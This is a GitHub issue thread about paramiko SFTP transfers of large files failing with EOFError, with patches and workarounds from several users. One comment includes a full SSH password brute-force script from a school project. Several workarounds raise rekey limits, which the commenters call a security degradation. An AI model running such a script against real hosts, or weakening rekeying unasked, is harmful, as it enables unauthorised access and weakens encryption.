Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

EOFError when getting a big file (900MB) via SFTP. #151

Closed
etienned opened this issue Mar 22, 2013 · 40 comments
Closed

EOFError when getting a big file (900MB) via SFTP. #151

etienned opened this issue Mar 22, 2013 · 40 comments

Comments

@etienned
Copy link

I'm trying to use duplicity to backup my server to a CrushFTP server (windows) in SFTP, but it always drop connection when getting some big files.

So I tried to get a problematic file with paramiko directly and got the same error Server connection dropped meaning an EOFError was raise (bytes received == 0). I put a print statement in _read_all method to show how many bytes were received. On one thread it's getting rapidly to 32777 then stay there. Another thread goes up to 7049 then back to 0 and then never more then 200. After a long long time (many minutes) I receive the EOFError.

If I try to get the same file with lftp it works without any problems.

Using paramiko 1.10.0, python 2.6.5 on Ubuntu Server LTS 10.0.4 amd64.

@kaorihinata
Copy link

I think this might be related to issue #124 in which I'm also accessing a Windows hosted SFTP server (GlobalSCAPE) and downloading pretty large files (hundreds of MBs to tens of GBs). Do you have access to the SFTP server itself as well as its logs? That's the one thing I don't have access to with our current vendor. Otherwise, all of the symptoms you mention above match what we're seeing.

@etienned
Copy link
Author

etienned commented Apr 2, 2013

Yes, it's possibly related. There's also, at least, two posts on StackOverflow that are probably related.

About the SFTP server logs, it could be possible for me to get access to it, but not easily. But the admin running the server told me that there's nothing abnormal in the logs?

@kaorihinata
Copy link

I'm in a similar situation. We can get access to the logs, but the admin in charge is rather difficult to deal with and will most likely intentionally ignore our tickets. To add insult to injury, while we have managed to get logs from them before, GlobalSCAPE is a multi-protocol solution, so it mangles the logs into an standard "FTP-ish" format before saving them. As a result, any information specific to SFTP is lost. I don't think they'd give me the time of day if I asked for debug logs (if the product even supports them).

We were also told that there's "nothing abnormal" about our logs, but when they actually gave them to us, the logs were indicating that multiple downloaded attempts finished successfully, each after transferring differing numbers of bytes (far smaller than the actual size of the file) for the same file. Additionally, they never recorded the disconnection. If you can get a few chunks of log to scrutinize yourself, it might be more helpful. If you can get protocol specific logs, even better. I'm not expecting a lot from these Windows SFTP server solutions though.

@mikegeise
Copy link

Was any traction made with this? I am hitting the same roadblock with a file over 1GB in size.

@kaorihinata
Copy link

Unfortunately not. I've been using Perl + Net::SFTP::Foreign as a replacement for the time being. Mainly because it piggybacks off the openssh binary which has proven to be far more reliable.

@rsheshadri
Copy link

Any updates on this? Running into the same error

@kaorihinata
Copy link

Not that I'm aware of. I assume the current maintainer mostly uses it for his deployment solution (fabric), so issues with large files on platforms he doesn't (officially?) support anyway don't seem to attract much interest. It's also a pain to reproduce this bug without an appropriate file and server combination, and nobody has come forward to try to troubleshoot it, so I've just avoided using paramiko since it can't be relied on for my purposes.

@rsheshadri
Copy link

Any suggestions on other modules I can use instead of paramiko?

@rsheshadri
Copy link

for large files ie

@bitprophet
Copy link
Member

@kaorihinata is mostly right, though I do my best to look at things from a "pure" paramiko standpoint (i.e. I won't ignore an issue just because it doesn't impact Fabric, even if Fabric-related issues do get more love). The problem here is much more the difficulty in reproducing & the nonstandard platform :(

Always open to merging patches that users say "this fixes my problem X" and which can be proven to not break eg POSIX platforms, but this ticket's not at that stage yet unless I'm missing something.

@kaorihinata
Copy link

To be honest, I'd probably blame the vendor for their loose interpretation of the standard and dubious definition of "production ready" when it comes to code. It may be the case that OpenSSH works with these servers due to workarounds for broken servers. If I come across the issue again, I will try to determine the cause.

@rsheshadri
Copy link

@kaorihinata so what do you use currently to transfer files > 1GB? Fabric if so can you point me to a link where I can find sample code to implement a similar get operation using it

@kaorihinata
Copy link

@rsheshadri I wasn't required to use Python as long as I had a working solution and since the script was pretty simple, I switched to using Net::SFTP::Foreign with Perl. It uses the OpenSSH client on the backend so compatibility is the best you're going to get.

@joostdevries
Copy link

Running into this issue with a significantly smaller file too. I've tracked it down to the fact that the max. packet_size/window_size are very small after connecting (4096 and 32759).. If I manually override these values to I can get to 2.1 MB before the upload stalls.. This only occurs on a handful of remotes.

The only way of overriding that worked so far was:

        sftp_connection.get_channel().in_window_size = 2097152
        sftp_connection.get_channel().out_window_size = 2097152
        sftp_connection.get_channel().in_max_packet_size = 2097152
        sftp_connection.get_channel().out_max_packet_size = 2097152

@bitprophet would love to work with you on debugging this.

@horida
Copy link

horida commented Jul 24, 2015

I recently ran in a similar problem when downloading files larger than 100MB from a CrushSFTP server. What happened was that the CrushSFTP server closed the socket as soon as paramiko requested a package beyond the file size. This is actually what happens in SFTPFile.read at the end of the while-loop. Curious enough, this only happens with files larger than 100MB, but I guess this might be some configuration of the CrushSFTP. For smaller files I received EOF when reading beyond the files size (@bitprophet: I don not really understand why paramiko is doing this).

The following changes in the code solved the problem for me:
in SFTPFile.read (with complete_file_size being passed as an extra argument to the method):

    while len(self._rbuffer) < size:
        read_size = size - len(self._rbuffer)
        if self._flags & self.FLAG_BUFFERED:
            read_size = max(self._bufsize, read_size)
        try:
            new_data = self._read(read_size)
        except EOFError:
            new_data = None
        if (new_data is None) or (len(new_data) == 0):
            break
        self._rbuffer += new_data
        self._realpos += len(new_data)
        # NOTE: this is the break condition I added to check if I read the complete file
        if self._realpos >= complete_file_size:
            break

Furthmore, in SFTPClient.getfo an extra break condition to not call again read:

        while True:
            data = fr.read(32768, file_size) # NOTE: passing the filesize
            fl.write(data)
            size += len(data)
            if callback is not None:
                callback(size, file_size)
            # NOTE: I could actually use the callback, but since I was patching the code anyway, the
            # second break to not call again fr.read
            if size == file_size:
                break
            if len(data) == 0:
                break

@lndbrg
Copy link
Contributor

lndbrg commented Jul 24, 2015

@horida can you send them as pull requests and i can look into and see if i can figure out why it's misbehaving? (that pull request probably won't be merge, but i know where in the code the issues are)

@horida
Copy link

horida commented Jul 28, 2015

@lndbrg here is the pull request: #564
It is not really ready to merge (as request by you). But it shows the fix that solved the problem for me.
Don't hesitate to contact me in case of any question.
Thanks for you efforts.

@ansell
Copy link

ansell commented Dec 16, 2015

It would be great to see a review of pull request #564 and to create a full fix for this issue.

@ansell
Copy link

ansell commented Dec 16, 2015

I am getting this issue communicating with OpenSSH-6.2 server btw, so the "Nonstandard platforms" tag isn't relevant to me.

debug1: Remote protocol version 2.0, remote software version OpenSSH_6.2

@bpownow
Copy link

bpownow commented Feb 23, 2016

Has this been fixed? I'm getting SSHException: Server connection dropped: around ~168MB through the upload to an SFTP.

@rsheshadri did you find a good workaround (using python)?

@duritong
Copy link

This is becoming more and more a problem with duplicity and bigger backups. Luckily duplicity has a "legacy" ssh backend, that can be used successfully instead of the paramiko one:
http://duplicity.nongnu.org/duplicity.1.html#sect21

--ssh-backend pexpect

The proposed patch in #564 did not work for me. Talking to a wheezy openssh server.

@joostdevries
Copy link

FYI: I actually ended up implementing a combo of the normal sftp command with pexpect. Have not had issues since.

@ansell
Copy link

ansell commented Mar 1, 2016

FYI, I abandoned Paramiko and am sending things successfully using the system scp executable.

@dardanxhymshiti
Copy link

Any solution to this problem yet? I am still facing this error when downloading files over 500MB.

@kaorihinata
Copy link

I'm unaware of any solution to this. It's also a bit difficult to reproduce with any consistency. It would make it a lot easier to solve if someone was able to reproduce it consistently, and someone else attached to the ticket was able to confirm the method. In my case it was random, so it was difficult to pin down what was happening.

@wieslaw-nosal
Copy link

Run into the same problem with 600MB files. Is there any proper fix for this?

@torzsmokus
Copy link

My workarounds: https://stackoverflow.com/a/48170689/501765

@magnusja
Copy link

magnusja commented Jul 4, 2019

        with paramiko.Transport((server, 22)) as transport:
            # SFTP FIXES
            transport.default_window_size = paramiko.common.MAX_WINDOW_SIZE // 2
            #transport.default_max_packet_size = paramiko.common.MAX_WINDOW_SIZE
            transport.packetizer.REKEY_BYTES = pow(2,
                                                   40)  # 1TB max, this is a security degradation!
            transport.packetizer.REKEY_PACKETS = pow(2,
                                                      40)  # 1TB max, this is a security degradation!
            # / SFTP FIXES

            transport.connect(username=username, password=pw)
            with paramiko.SFTPClient.from_transport(transport) as sftp:
                sftp.get_channel().in_window_size = 2097152
                sftp.get_channel().out_window_size = 2097152
                sftp.get_channel().in_max_packet_size = 2097152
                sftp.get_channel().out_max_packet_size = 2097152
                files = sftp.listdir()
                files = list(filter(lambda x: x.endswith(".zip"), files))
                print(files)

                if len(files) > 2:
                    for f in files:
                        target = str(dst / f)
                        print(f"Downloading {f} to {target}")
                        sftp.get(f, target)

                    for f in files:
                        sftp.remove(f)

This fixes it for me for files > 600MB

(not sure what exactly I did there but it works ¯_(ツ)_/¯)

@zachliu
Copy link

zachliu commented Jan 9, 2020

transport = paramiko.Transport((host, port))

transport.default_window_size = paramiko.common.MAX_WINDOW_SIZE

transport.packetizer.REKEY_BYTES = pow(2, 40)
transport.packetizer.REKEY_PACKETS = pow(2, 40)

This fix works for us. Now we're able to download that stupid file of 3.2Gb.

@mrprobz
Copy link

mrprobz commented Mar 5, 2021

Where does one add this piece? when using pysftp for example which uses paramiko..

@malthe
Copy link

malthe commented Jun 8, 2021

From RFC4253:

It is RECOMMENDED that the keys be changed after each gigabyte of transmitted data or after each hour of connection time, whichever comes sooner

It seems that the right fix here is perhaps to adjust (increase) the data and/or time limits for rekeying, but also fix whatever bug is causing the connection to drop when it happens?

@gabrielconlon
Copy link

gabrielconlon commented Sep 9, 2021

Has anyone been able to track down the issue with this? I have been able to successfully recreate the error repeatedly during a school project attempting to write a python script to brute force SSH.

Looking at the packetizer docs for Paramiko Packet handling, I notice that write_all is not included. but there is an EOF error for read_all

All the above stack overflow links seem to discuss issues with file size.

Traceback

Invalid credentials for: student:123456
Invalid credentials for: student:1234567
Invalid credentials for: student:12345678
Valid Credentials: HOSTNAME: localhost
              USERNAME: student
              PASSWORD: password
              PORT: 1818
              
Invalid credentials for: mysql:123456
Invalid credentials for: mysql:1234567
Invalid credentials for: mysql:12345678
Invalid credentials for: mysql:password
Invalid credentials for: mysql:pasword123456
Invalid credentials for: mysql:password1234
Invalid credentials for: mysql:password!
Traceback (most recent call last):
  File "/Users/gabrielconlon/Projects/sshBruteForce/sshBruteForce.py", line 71, in <module>
    if checkConnection(target, u, p, port):
  File "/Users/gabrielconlon/Projects/sshBruteForce/sshBruteForce.py", line 22, in checkConnection
    client.connect(hostname=target, username=username, password=password, port=port, timeout=2)
  File "/Users/gabrielconlon/.pyenv/versions/3.9.5/lib/python3.9/site-packages/paramiko/client.py", line 406, in connect
    t.start_client(timeout=timeout)
  File "/Users/gabrielconlon/.pyenv/versions/3.9.5/lib/python3.9/site-packages/paramiko/transport.py", line 660, in start_client
    raise e
  File "/Users/gabrielconlon/.pyenv/versions/3.9.5/lib/python3.9/site-packages/paramiko/transport.py", line 2034, in run
    self.packetizer.write_all(b(self.local_version + "\r\n"))
  File "/Users/gabrielconlon/.pyenv/versions/3.9.5/lib/python3.9/site-packages/paramiko/packet.py", line 367, in write_all
    raise EOFError()
EOFError

This errors every time on that exact spot in the file (line 7) no matter what is written there. Code below:

#!/usr/bin/env python3
##################################################
# SSH Brute Force
# Gabriel Conlon
# created: 09 September 2021
# in fulfillment of requirements for:
# SecureSet Cybersecurity Engineer Networks 400
##################################################

import paramiko
import socket
import argparse

# prompt user for port to check, default 22

def checkConnection (target, username, password, port):
    client = paramiko.SSHClient()
    # add known hosts
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=target, username=username, password=password, port=port, timeout=2)
        client.open_sftp()
    except socket.timeout:
        print("Target unreachable")
        return False
    except paramiko.AuthenticationException:
        print(f"Invalid credentials for: {username}:{password}")
        return False
    except paramiko.SSHException:
        print("Uncaught SSH exception")
        return False
    # except EOFError:
    #     return False
    # except:
    #     print("Unknown exception")
    #     return False
    else:
        # connection established
        print(f"""Valid Credentials: HOSTNAME: {target}
              USERNAME: {username}
              PASSWORD: {password}
              PORT: {port}
              """)
        # command = "id"
        # print(f"User privileges: {client.exec_command(command)}")
        client.close()
        return True

if __name__ =="__main__":
    parser = argparse.ArgumentParser(description="SSH Dictionary Attack")
    parser.add_argument("target", help="Target machine")
    parser.add_argument("-p", "--port", help="Port")
    parser.add_argument("-P", "--passwords", help="Password file")
    parser.add_argument("-u", "--username", help="SSH Username")

    #parse args
    args = parser.parse_args()
    target = args.target
    passwords = args.passwords
    users = args.username
    port = args.port

    # read files
    users = open(users).read().splitlines()
    passwords = open(passwords).read().splitlines()

    # attack
    for u in users:
        for p in passwords:
            if checkConnection(target, u, p, port):
                # save if valid
                open("validCreds.txt", "w").write(f"""
                Username: {users}@{target}
                Password: {p}
                """)
                break

@jobo3208
Copy link

jobo3208 commented Jan 21, 2022

@mrprobz

Where does one add this piece? when using pysftp for example which uses paramiko..

It's not documented AFAIK, but this will work for pysftp in a pinch:

with pysftp.Connection(...) as sftp:
    sftp._transport.default_window_size = paramiko.common.MAX_WINDOW_SIZE
    sftp._transport.packetizer.REKEY_BYTES = pow(2, 40)  # security degradation
    sftp._transport.packetizer.REKEY_PACKETS = pow(2, 40)  # security degradation

    ...

@torzsmokus
Copy link

@jobo3208
@zachliu

I suggest to always add the security warning in a comment to these fixes, as the implied security degradation is not self-evident.

@kkr78
Copy link

kkr78 commented Mar 9, 2022

We have been using the following code for quite a long and it worked for the majority of the large files up to 10GB. Today, we start seeing errors when downloading 21GB files. is there any way to fix it? What's the biggest file u r able to download w/ paramiko?

Env:
paramiko-2.9.2
python 2 and 3 (same issue w/ both python 2 and 3)

Error:

SSHException('Server connection dropped: ',)) Exception in thread Thread-3: Traceback (most recent call last): File "/usr/lib64/python2.7/threading.py", line 804, in __bootstrap_inner self.run() File "/usr/lib64/python2.7/threading.py", line 757, in run self.__target(*self.__args, **self.__kwargs) File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/sftp_file.py", line 538, in _prefetch_thread self, CMD_READ, self.handle, long(offset), int(length) File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/sftp_client.py", line 846, in _async_request self._send_packet(t, msg) File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/sftp.py", line 198, in _send_packet self._write_all(out) File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/sftp.py", line 162, in _write_all n = self.sock.send(out) File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/channel.py", line 801, in send return self._send(s, m) File "/home/ec2-user/.local/lib/python2.7/site-packages/paramiko/channel.py", line 1198, in _send raise socket.error("Socket is closed") error: Socket is closed

Code:

`
import paramiko
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(connection.get('host'), username=connection.get('login'), password=connection.get('password'))

tr = client.get_transport()
tr.packetizer.REKEY_BYTES = pow(2, 40)
tr.packetizer.REKEY_PACKETS = pow(2, 40)
tr.default_max_packet_size= 200 * 1024 * 1024
tr.default_window_size= paramiko.common.MAX_WINDOW_SIZE
sftp = client.open_sftp()

`

@kkr78
Copy link

kkr78 commented Mar 15, 2022

any update on this? If this can't be resolved w/ paramiko, we have to look for a different solution. Has anyone been able to download files large than 10GB w/paramiko? What's the largest file that's downloaded or tested w/ paramiko. If there is an alternative solution, please let me know.

@jprafael
Copy link

I noticed that using prefetch=False solved both the EOFError and occasional hangs waiting for final few bytes (that would never come). The symptoms seem to suggest some race condition in the async download code.

With prefetch=False the download is slow but consistent. One of the issues is the hardcoded packet size which is there for compatibility but small for modern servers. I copy pasted my way out of it and got reasonable speeds (but not as good as with prefetch=True).

For those in need of a short term solution:

def paramiko_sftp_get(
        sftp_client: SFTPClient,
        sftp_file: str,
        local_file: str,
        callback: Callable[[int, int], None],
        max_request_size: int = 2 ** 20) -> int:
    """
    A copy of paramiko's sftp.get() function that allows for sequential download
    of large chunks.
    This is a work around for https://github.com/paramiko/paramiko/issues/151.
    The issue does not occur when prefetch=False (i.e. sequential download) indicating
    that there seems to be an error with the parallel approach. However, the sequential
    version in paramiko does not allow customizable request size, and instead hardcodes a
    small value that is known to work with many SFTP implementations.
    With the possibility of large chunks, the sequential download's RTT overhead becomes
    less of a pain and a viable alternative.
    :param sftp_client: Paramiko's SFTPClient.
    :param sftp_file: The remote file in sftp.
    :param local_file: The local file.
    :param callback: A function that is invoked on every chunk.
    :param max_request_size: The max request size, defaults to 2**20.
    :return: The size of the file in bytes.
    """

    with open(local_file, "wb") as local_handle:
        file_size = sftp_client.stat(sftp_file).st_size
        assert file_size is not None

        with sftp_client.open(sftp_file, "rb") as remove_handle:
            paramiko_transfer_with_callback(
                remove_handle,
                local_handle,
                file_size,
                callback,
                max_request_size
            )

    return file_size


def paramiko_transfer_with_callback(
        reader: SFTPFile,
        writer: BinaryIO,
        file_size: int,
        callback: Callable[[int, int], None],
        max_request_size: int):
    """
    A copy of paramiko's sftp_client._transfer_with_callback with max_request_size support.
    :param reader: The reader file handle.
    :param writer: The writer file handle.
    :param file_size: The size of the file to be downloaded.
    :param callback: A function that is invoked on every chunk.
    :param max_request_size: The max request size, defaults to 2**20.
    """
    size = 0

    while True:
        remaining = file_size - size
        chunk = min(max_request_size, remaining)

        data = reader.read(chunk)
        writer.write(data)
        size += len(data)

        if len(data) == 0:
            break

        if callback is not None:
            callback(size, file_size)

    assert size == file_size

I believe this value. along with SFTPFile.MAX_REQUEST_SIZE, could be made configurable in Transport settings for a clean solution.

@bitprophet
Copy link
Member

We're going to merge #2058 which will likely solve this; please open new issues after the next feature release (should be Paramiko 3.3) if you continue to reproduce the issue. Thanks!

@robguttman
Copy link

We're going to merge #2058 which will likely solve this; please open new issues after the next feature release (should be Paramiko 3.3) if you continue to reproduce the issue. Thanks!

Thanks, @bitprophet ! When should we expect to see Paramiko 3.3 on PyPi?

@bskinn
Copy link
Contributor

bskinn commented Jun 25, 2023

When should we expect to see Paramiko 3.3 on PyPi?

My guess is it will be sometime in the next couple of months, but it could be longer.

I believe bitprophet wants to give time for the experimental key/auth features in v3.2 to work their way out into the wild & have some feedback come in before taking the next step on those in v3.3.

Plus, it's all dependent on the pace bitprophet can reach with his open source allocation, given that his time is split among multiple projects.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests